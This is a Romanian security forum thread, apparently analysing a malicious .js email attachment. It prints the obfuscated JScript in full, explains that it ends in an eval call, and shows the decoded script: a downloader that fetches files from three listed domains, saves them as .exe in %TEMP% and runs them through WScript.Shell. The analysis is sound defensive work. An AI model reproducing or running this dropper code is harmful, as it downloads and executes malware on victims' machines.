nardini Posted February 8, 2016 Report Share Posted February 8, 2016 var a9='555C535E060511240611080F17170A4A0A0509015E3C5E16010508171405070157004A060D1E5E17515E555051505C55535052555E55',d1='; i',p78='exe',w16='; ',p94='00) ',m91='ar ',j1='e(',z17='s ',y17=' { ',w80='if (',m42=' {',x23='ngs(',d74=',"',d23='ak',b19='n+".e',h21='Stri',z95='nt',e50=' { f',d59=' xa.w',n17='se); ',o74='or',f55='d=',j20='ver.c',i68='ter',t56='== 2',p68='rit',t60='ect(',u95=' i',w48='.Exp',w64='.fr',g15='or (',f16='e(xo.',v87='va',m76='o.ope',u66='re',b45=' xa.',m82='.com',v92='n(); ',r77='one',n97=' xa.c',o55=' va',z51=' ws',c22='{ xa',n38=' dn =',b15='gr',b16='coun',p98='; } ',e95='oFil',k28='; bre',l20='xa',n65='HTT',u96='23.',y28='r ',s13=') { l',l48='f (',l77='ele',i58=' ld',c53='el',s58='am',b78='Scr',p99='nd();',h91='eval',y92=' x',c83='n("G',d6='ser',f28='http',c60='} cat',r65='; tr',t96='om',z60='0;',k96='xa',b71=' { x',v63='".spl',f61='; var',i95='andEn',z96='bjec',u45='ate.c',f51='+n+',g79='2)',v6='los',e9='; va',v45='xo.se',x49='2)+"',i2=' = ',y30='az',p82='2.XML',j13='.size',w13='re',l27='t.Cre',z63=' "); ',y91='00)',w67='93',x46='= WS',x68='/?id=',k55='t("',s99='catch',t29='e()',r93=' ex',o76='xa ',y34='o = W',t44='=3; ',x41='; i<',g37='i=ld',c65='1785"',z58='tring',l15=' { ',g81='b.le',p12='l")',z30='1; n<',g83=' "ya',z23='+b[',b74=' (',w35='fn+',z88='un(fn',k78=' = W',w46='++)',l40='.co.',t47='har',g96=' = 1;',v11='rn',q54='.type',n49=v87+'r b ='+g83+'tr'+y30+r77+m82+r93+'qu'+'is'+'iteco'+'rpse'+l40+'nz.'+'s740'+u96+b15+'id'+d6+j20+'om m'+'ai'+'nes'+l77+'ctre'+'alest'+u45+t96+v63+'it'+'("'+z63+'var'+z51+k78+'Scri'+'pt.C'+'rea'+'te'+'Objec'+'t("W'+b78+'ipt.'+'Sh'+c53+p12+e9+'r '+'fn '+'= ws'+w48+i95+'vir'+'onme'+z95+h21+x23+'"%T'+'EM'+'P%'+'")+S'+z58+w64+'omC'+t47+'Code'+'(9'+x49+'30298'+'8"'+f61+y92+y34+'Scrip'+l27+'ateO'+z96+k55+'MS'+'XML'+p82+n65+'P");'+o55+y28+o76+x46+'crip'+'t.Cr'+'eateO'+'bj'+t60+'"ADO'+'DB.St'+w13+s58+'"); '+'var'+i58+i2+z60+' f'+g15+'va'+'r 
n='+z30+t44+'n++)'+e50+o74+' (v'+m91+g37+x41+g81+'ngth;'+u95+w46+l15+'var d'+'n = 0'+'; try'+b71+m76+c83+'ET"'+d74+f28+'://"'+z23+'i]+"/'+b16+i68+x68+'"+a'+'9+"&'+v11+f55+w67+c65+'+n,'+' fal'+n17+v45+p99+' if'+b74+'xo.s'+'tatu'+z17+t56+p94+c22+'.ope'+v92+l20+q54+g96+d59+p68+f16+u66+'spons'+'eBod'+'y)'+d1+l48+k96+j13+' >'+' 10'+y91+m42+n38+' 1; x'+'a.'+'posit'+'ion'+' = 0;'+b45+'saveT'+e95+j1+w35+b19+'xe",'+g79+r65+'y { '+'ws.R'+z88+f51+'".'+p78+'",1'+',0); '+c60+'ch '+'(er)'+y17+'}; };'+n97+v6+t29+'; }'+w16+w80+'dn '+'== 1'+s13+'d = i'+k28+d23+'; }'+p98+s99+' ('+'er) {'+' }; }'+'; }'+';';this[h91](n49); primit sub forma de attash in email scanned.000608066.doc.js Quote Link to comment Share on other sites More sharing options...
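Nytro Posted February 9, 2016

Ca idee, se poate dezobfusca foarte usor. La final se poate vedea: "this[h91](n49);". Cum h91 este 'eval', acesta este un apel eval() pe sirul construit in n49. Ce se intampla daca afisam acel parametru (n49)? Adica inlocuim "this[h91]" cu "document.write" si obtinem:

var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http://"+b[i]+"/counter/?id="+a9+"&rnd=931785"+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };

PS: Cred ca mizeria asta (cu WScript.Shell) merge doar pe IE6 maxim IE7.

[Nota: scriptul decodat este un downloader: pentru n de la 1 la 3 cere http://<host>/counter/?id=<a9>&rnd=931785<n> de la gazdele din lista b, salveaza raspunsul mai mare de 1000 de octeti ca %TEMP%\302988<n>.exe si il porneste cu ws.Run. Obiectul WScript exista doar in Windows Script Host (wscript.exe/cscript.exe), nu in browser, asa ca un atasament .js deschis cu dublu-click in Windows ruleaza indiferent de browserul instalat. Pentru analiza, afisati n49 ca text simplu: document.write il interpreteaza ca HTML si poate ascunde ce se afla intre "<" si ">".]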
nardini Posted February 10, 2016

Vad ca merge si pe Mozilla, rulat intr-o masina virtuala.